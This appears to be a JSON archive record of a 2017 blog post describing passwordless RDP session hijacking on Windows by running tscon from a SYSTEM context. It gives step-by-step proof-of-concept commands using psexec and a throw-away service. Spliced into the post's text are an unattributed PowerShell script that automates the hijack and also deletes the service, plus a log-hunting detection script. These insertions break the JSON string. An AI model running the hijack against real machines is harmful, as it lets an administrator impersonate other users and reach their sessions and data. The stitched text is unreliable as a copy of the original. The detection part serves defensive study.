{
	"id": "e97982fb-17ca-4b70-888b-c107e14a2525",
	"created_at": "2026-04-06T00:10:38.164174Z",
	"updated_at": "2026-04-10T03:20:25.022964Z",
	"deleted_at": null,
	"sha1_hash": "d4d9a9e9880bc663af110aba30c7055e007e3c19",
	"title": "Passwordless RDP Session Hijacking Feature All Windows versions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 107549,
	"plain_text": "Passwordless RDP Session Hijacking Feature All Windows versions\r\nArchived: 2026-04-05 20:39:11 UTC\r\n* This post is periodically updated; all updates are at the end of the post.\r\nUpdate: Added Windows Server 2016 Datacenter Demo\r\nHey there,\r\nBlogpost in 20 seconds: fun with a sethc-backdoored host :) somewhere on the internet [embedded demo; not rendered in the archived copy]\r\nRecently I've played with sethc/utilman logon screen backdoors, and almost every time I used just the command line. Occasionally I've looked at the Users tab in Task Manager (taskmgr.exe) and clicked the Connect button, and surprisingly I got connected to the selected user's session.\r\nhttp://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\r\nPage 1 of 5\r\nWhen I checked it again with local admin rights, it failed by asking for the user's password.\r\nWhy and how did that happen? Let's dig deeper.\r\nThe Microsoft documentation for tscon:\r\nhttps://technet.microsoft.com/en-us/library/cc770988(v=ws.11).aspx\r\nhttps://technet.microsoft.com/en-us/library/cc731007(v=ws.11).aspx\r\ncontains a couple of important remarks:\r\nRemarks\r\nYou must have Full Control access permission or Connect special access permission to connect to another session.\r\nThe /dest:\u003cSessionName\u003e parameter allows you to connect the session of another user to a different session.\r\nIf you do not specify a password in the \u003cPassword\u003e parameter, and the target session belongs to a user other than the current one, tscon fails (not really).\r\nI've got it! The Sticky Keys (sethc.exe) cmd backdoor at the Windows logon screen runs as NT AUTHORITY\\SYSTEM, which has Full Control access permission and can therefore connect to EVERY user session without asking for a password.\r\nSo we've got session hijacking here. 
The funniest thing is that the legitimate user isn't asked to log out: with this technique the user is simply kicked out of the session without any notification.\r\nAttack Vector Details:\r\nA privileged user who can gain command execution with NT AUTHORITY\\SYSTEM rights can hijack any currently logged-in user's session without any knowledge of that user's credentials.\r\nThe target Terminal Services session can be either active (connected) or disconnected; in both cases its owner is just disconnected and the attacker's own session receives the target's desktop.\r\nThis is a high-risk vulnerability which allows any local admin to hijack a session and get access to:\r\n1. A domain admin session.\r\n2. Any unsaved documents the hijacked user is working on.\r\n3. Any other systems/applications the hijacked user previously logged in to (this may include other Remote Desktop sessions, network share mappings, applications which require separate credentials, e-mail, etc.).\r\nExample scenario:\r\nA bank employee has access to a billing system and credentials to log in to it. One day he comes to work, logs in to the billing system and starts working. At lunch time he locks his workstation and goes out to lunch. Then the system administrator comes to the employee's workstation and logs in with his administrator account. According to the bank's policy, the administrator's account should not have access to the billing system, but with a couple of built-in Windows commands this system administrator hijacks the desktop the employee left locked. From now on the sysadmin can perform malicious actions in the billing system under the billing employee's account.\r\nThere is a huge number of scenarios like this.\r\nFurthermore, an attacker doesn't need tools like Metasploit, incognito or mimikatz, which are commonly used for token manipulation and impersonating logged-in users. Everything is done with built-in commands.
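The built-in-commands procedure that the Proof of Concept section below carries out by hand (enumerate sessions with query user, then run tscon from a SYSTEM context through a throw-away service) wrapped into PowerShell functions, as an added example that is not part of the original post. It assumes an elevated prompt on the same host, that the caller's own session has a SESSIONNAME (rdp-tcp#N or console), and that query user prints the default English column layout; the service name sesshijack and the function names are arbitrary.

```powershell
# Added example, not from the original post. Run from an elevated PowerShell
# prompt inside the session that should receive the target's desktop.

function Get-TsSession {
    # Parse the text output of 'query user' into objects. Fields are split on
    # runs of spaces; a disconnected session prints no SESSIONNAME, which is
    # detected by the second field being the numeric session ID.
    $rows = @(query user 2>$null | Select-Object -Skip 1)
    foreach ($row in $rows) {
        $f = $row.Trim().TrimStart('>').Trim() -split '[ ]+'
        if ($f[1] -match '^[0-9]+$') {
            [pscustomobject]@{ User = $f[0]; Session = ''; Id = [int]$f[1]; State = $f[2] }
        } else {
            [pscustomobject]@{ User = $f[0]; Session = $f[1]; Id = [int]$f[2]; State = $f[3] }
        }
    }
}

function Invoke-TsSessionHijack {
    # Connect $TargetUser's session to our own session by running tscon as
    # the SYSTEM account through a temporary service, exactly as the
    # sc create / net start pair in the post does. No password is needed
    # because SYSTEM holds Full Control on every session.
    param(
        [Parameter(Mandatory)][string]$TargetUser,
        [string]$ServiceName = 'sesshijack'   # arbitrary name
    )
    $sessions = @(Get-TsSession)
    $mySid = (Get-Process -Id $PID).SessionId
    $me = $sessions | Where-Object { $_.Id -eq $mySid } | Select-Object -First 1
    if (-not $me -or -not $me.Session) {
        throw 'the calling session has no SESSIONNAME; run this from an RDP or console session'
    }
    $target = $sessions | Where-Object { $_.User -eq $TargetUser -and $_.Id -ne $mySid } |
              Select-Object -First 1
    if (-not $target) { throw ('no session found for user ' + $TargetUser) }

    # cmd.exe is not a real service, so the Service Control Manager reports a
    # start failure after its timeout; tscon has already executed by then.
    # 'sc start' returns immediately instead of waiting like 'net start' does.
    $binPath = 'cmd.exe /c tscon ' + $target.Id + ' /dest:' + $me.Session
    sc.exe create $ServiceName binpath= $binPath | Out-Null
    sc.exe start  $ServiceName | Out-Null
    Start-Sleep -Seconds 2
    sc.exe delete $ServiceName | Out-Null   # remove the service registration
    return $target
}

# Usage (from an elevated prompt in your own RDP session):
#   Get-TsSession | Format-Table
#   Invoke-TsSessionHijack -TargetUser 'administrator'
```

The only difference from the post's manual steps is that the service is deleted again afterwards; the 7045 service-installation event it leaves in the System log remains, which is exactly the kind of trace a defender can look for.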
Every admin can impersonate any logged-in user, either locally with physical access or remotely via Remote Desktop (see PoC).\r\nTested on:\r\nWindows Server 2016 (confirmed by Kevin Beaumont @GossiTheDog)\r\nWindows Server 2012 R2\r\nWindows Server 2008\r\nWindows 10\r\nWindows 7\r\nWe could talk about an endless number of examples.\r\nIt can be done remotely, as shown in the Proof of Concept: an attacker can hijack an active or disconnected session remotely via Remote Desktop.\r\nI have used this technique for about three weeks in my ongoing penetration tests on a daily basis. In a very simple way it helps me to get access to sensitive information like e-mails, open documents, clear-text passwords that administrators write down in Notepad (not intended for saving, but for temporarily writing them somewhere), open RDP sessions to other external domains (think cloud), or other applications that use different login credentials.\r\nSomeone may say: if you are admin, you can dump the server's memory and parse it. That's correct, but you don't need to any more. Just two simple commands and you are in. The most incredible thing is that I don't need to know the credentials of the hijacked user; it is pure passwordless hijacking.\r\nA successful attack depends heavily on time and gathered information. If you need to dump memory to get your sensitive info, you're in trouble: it means you've already tried all the quick wins you know.\r\nFor example, when hijacking a user (active or disconnected) who is currently working remotely on some sensitive server that I have no access to and didn't even know about, this technique allows me to compromise that server in less than a minute. Everything is real and from my own experience.\r\nFurthermore, as I understand it, it is very hard to catch this attack when it happens. 
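One way to hunt for this technique in the host's own event logs, as an added example that is neither Kevin Beaumont's OMS alert nor code from the original post. It assumes an elevated PowerShell prompt, that process creation auditing (Security event 4688) is enabled, with command-line inclusion turned on if the /dest argument is to be visible, and it additionally checks System event 7045 (service installation), which the sc create step of the PoC produces. The regular expressions assume the English event message layout; the sample message at the end is constructed, not a real log entry.

```powershell
# Added example, not from the original post. Looks for the two artefacts the
# service-based hijack leaves: a tscon.exe process start (Security 4688) and a
# service registered with tscon in its image path (System 7045).

function Test-TsconHijackEvent {
    # Return $true when a rendered event message looks like tscon being used
    # to re-attach a session. English message layout is assumed.
    param(
        [Parameter(Mandatory)][int]$Id,
        [Parameter(Mandatory)][string]$Message
    )
    switch ($Id) {
        4688    { return [bool]($Message -match 'New Process Name:.*tscon[.]exe') }
        7045    { return [bool]($Message -match 'Service File Name:.*tscon') }
        default { return $false }
    }
}

function Get-TsconDestination {
    # Pull the /dest: session name out of a command line or image path, or
    # return an empty string when it is absent (e.g. 4688 without
    # command-line auditing enabled).
    param([Parameter(Mandatory)][string]$Message)
    if ($Message -match '/dest:([A-Za-z0-9#-]+)') { return $Matches[1] }
    return ''
}

function Get-TsconHijackEvents {
    # Sweep the local Security and System logs since $Since and return one
    # object per suspicious event. Reading Security needs an elevated prompt.
    param([datetime]$Since = (Get-Date).AddDays(-1))
    $filters = @(
        @{ LogName = 'Security'; Id = 4688; StartTime = $Since },
        @{ LogName = 'System';   Id = 7045; StartTime = $Since }
    )
    foreach ($filter in $filters) {
        Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
            Where-Object { Test-TsconHijackEvent -Id $_.Id -Message $_.Message } |
            ForEach-Object {
                [pscustomobject]@{
                    Time     = $_.TimeCreated
                    Log      = $_.LogName
                    EventId  = $_.Id
                    Dest     = Get-TsconDestination -Message $_.Message
                    Computer = $_.MachineName
                    Summary  = $_.Message.Split([char]10)[0].Trim()
                }
            }
    }
}

# Constructed sample (not a real log entry) so the matcher can be exercised
# on a machine where the audit policy is not enabled:
$sample7045 = 'A service was installed in the system.' + [Environment]::NewLine +
              'Service Name:  sesshijack' + [Environment]::NewLine +
              'Service File Name:  cmd.exe /k tscon 1 /dest:rdp-tcp#55' + [Environment]::NewLine +
              'Service Type:  user mode service'
Test-TsconHijackEvent -Id 7045 -Message $sample7045
Get-TsconDestination -Message $sample7045

# Live sweep (elevated):
#   Get-TsconHijackEvents -Since (Get-Date).AddHours(-6) | Format-Table
```

Treat a hit as a lead rather than a verdict: administrators occasionally run tscon legitimately (for instance to move an RDP session to the console), so the useful signal is tscon launched from services.exe or by a SYSTEM-level account against a session owned by somebody else, which is what the Dest and Summary columns are there to show.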
Kevin Beaumont @GossiTheDog made an alert on tscon.exe usage with Microsoft OMS.\r\nI had a conversation about this finding with Benjamin Delpy @gentilkiwi, author of mimikatz:\r\n\"That is normal Windows API, that's the design flow, they use it. As mentioned earlier, if you are admin, you can do everything. But here is the point. Why and HOW did you become admin? If some unprivileged user becomes admin using some kind of local privilege escalation, that's the problem and not the design flow we are talking about. You can do everything, even patch terminal services in such a way that it will accept your token and allow shadowing mode without the user's knowledge,\" he said.\r\nProof of Concept:\r\nThe Microsoft documentation helps us to do this from the command line. All we need is an NT AUTHORITY\\SYSTEM command line: from such a prompt a single tscon \u003cID\u003e /dest:\u003cSessionName\u003e is enough, where ID is the target session and SessionName is your own session, the one that will receive the target's desktop.\r\nThe easiest method is psexec, but it requires psexec.exe to be present:\r\npsexec -s \\\\localhost cmd\r\nAnother method is to create a service that will connect the selected session to ours.\r\n1. Get all session information:\r\nC:\\Windows\\system32\u003equery user\r\n USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME\r\n administrator                             1  Disc            1  3/12/2017 3:07 PM\r\n\u003elocaladmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM\r\nC:\\Windows\\system32\u003e\r\n2. Create a service which will hijack the user's session (here session 1, the disconnected administrator session, is connected to our own session rdp-tcp#55):\r\nC:\\Windows\\system32\u003esc create sesshijack binpath= \"cmd.exe /k tscon 1 /dest:rdp-tcp#55\"\r\n[SC] CreateService SUCCESS\r\n3. Start the service:\r\nnet start sesshijack\r\nRight after that your session will be replaced with the target session. net start will eventually report that the service failed to start, because cmd.exe never registers with the Service Control Manager, but by then tscon has already run as SYSTEM and the switch has happened.\r\nSource: http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html"
	],
	"report_names": [
		"0-day-or-feature-privilege-escalation.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434238,
	"ts_updated_at": 1775791225,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d4d9a9e9880bc663af110aba30c7055e007e3c19.pdf",
		"text": "https://archive.orkl.eu/d4d9a9e9880bc663af110aba30c7055e007e3c19.txt",
		"img": "https://archive.orkl.eu/d4d9a9e9880bc663af110aba30c7055e007e3c19.jpg"
	}
}